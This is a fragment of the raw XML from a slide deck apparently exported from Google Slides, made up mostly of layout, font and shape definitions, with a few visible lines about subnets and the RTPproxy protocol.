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Black"/>
      <p:bold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Roboto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g11a+yaAbYwyaMPNc7NE9f+qzz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A56654-EA91-4F55-90DB-6ADEFF4DA2A4}">
  <a:tblStyle styleId="{98A56654-EA91-4F55-90DB-6ADEFF4DA2A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lack-bold.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide42.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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Roboto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RobotoLight-bold.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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1" name="Google Shape;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45" name="Google Shape;34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Clr>
                <a:srgbClr val="3C4043"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>You may have more than 2 subnets. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RTPproxy Protocol,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3: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8" name="Google Shape;368;p3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5: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2" name="Google Shape;382;p3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1" name="Google Shape;391;p3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eeaa6d1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eeaa6d127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3" name="Google Shape;413;p3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1" name="Google Shape;421;p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ef73e88d6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aef73e88d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ef73e88d6_0_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aef73e88d6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f73e88d6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aef73e88d6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ef73e88d6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aef73e88d6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8. Transition Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="15" name="Shape 15"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Google Shape;16;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2498" l="0" r="0" t="2489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="366508"/>
            <a:ext cx="11460479" cy="6124989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;17;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316134" y="2784634"/>
            <a:ext cx="11460434" cy="1056450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1"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18" name="Google Shape;18;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11477033" y="6609600"/>
            <a:ext cx="349141" cy="14085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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16400" y="6555534"/>
            <a:ext cx="10629218" cy="302400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="731350" spcFirstLastPara="1" rIns="0" wrap="square" tIns="121850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="95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5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5" name="Google Shape;95;p5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 name="Shape 99"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;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5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2" name="Google Shape;102;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6" name="Shape 106"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;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5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2" name="Shape 112"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Google Shape;113;p5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5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gaeeaa6d127_0_5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gaeeaa6d127_0_5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21" name="Google Shape;121;gaeeaa6d127_0_5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7. Subsection Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="20"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b="2498" l="0" r="0" t="2489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="366508"/>
            <a:ext cx="11460479" cy="6124989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;22;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365767" y="2784634"/>
            <a:ext cx="11460434" cy="1056450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="48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23" name="Google Shape;23;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11477033" y="6609600"/>
            <a:ext cx="349141" cy="14085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44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16400" y="6555534"/>
            <a:ext cx="10629218" cy="302400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="731350" spcFirstLastPara="1" rIns="0" wrap="square" tIns="121850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="95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10. Text with Sidebar">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="25" name="Shape 25"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Google Shape;26;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="118" l="0" r="0" t="118"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9398600" y="1213700"/>
            <a:ext cx="2438400" cy="5046398"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Google Shape;27;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="901300"/>
            <a:ext cx="8899568" cy="486450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="243750">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2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28" name="Google Shape;28;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1661067"/>
            <a:ext cx="8932726" cy="5196750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-463550" lvl="0" marL="457200" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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1pPr>
            <a:lvl2pPr indent="-463550" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-463550" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-463550" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-463550" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-463550" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-463550" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-463550" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-463550" lvl="8" marL="4114800" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1050"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1050"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1850" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Google Shape;29;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9408400" y="1213967"/>
            <a:ext cx="2418780" cy="504645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algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="135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30" name="Google Shape;30;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16567" y="0"/>
            <a:ext cx="8932726" cy="711600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="1219000" spcFirstLastPara="1" rIns="731350" wrap="square" tIns="487575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="32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31" name="Google Shape;31;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11477033" y="6609600"/>
            <a:ext cx="349141" cy="14085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45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="6541940"/>
            <a:ext cx="11460735" cy="13650"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="A9B7C0"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Google Shape;33;p45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365834" y="853440"/>
            <a:ext cx="11460735" cy="13650"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;34;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16400" y="6555534"/>
            <a:ext cx="10629218" cy="302400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="731350" spcFirstLastPara="1" rIns="0" wrap="square" tIns="121850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="95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9. Text Only">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="35" name="Shape 35"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;36;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16400" y="0"/>
            <a:ext cx="12224733" cy="711600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="1219000" spcFirstLastPara="1" rIns="731350" wrap="square" tIns="487575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="32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37" name="Google Shape;37;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="901300"/>
            <a:ext cx="12192026" cy="486450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="243750">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Google Shape;38;p46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365834" y="853440"/>
            <a:ext cx="11460735" cy="13650"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Google Shape;39;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11477033" y="6609600"/>
            <a:ext cx="349141" cy="14085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46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="6541940"/>
            <a:ext cx="11460735" cy="13650"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="A9B7C0"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Google Shape;41;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16400" y="6555534"/>
            <a:ext cx="10629218" cy="302400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="731350" spcFirstLastPara="1" rIns="0" wrap="square" tIns="121850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="95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700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1850" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Google Shape;42;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234" y="1712334"/>
            <a:ext cx="12192026" cy="4829550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-463550" lvl="0" marL="457200" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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1pPr>
            <a:lvl2pPr indent="-463550" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-463550" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-463550" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-463550" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-463550" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-463550" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-463550" lvl="7" marL="3657600" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1050"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1850" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-463550" lvl="8" marL="4114800" marR="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1050"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1050"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="185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5. Subsection Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="43" name="Shape 43"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
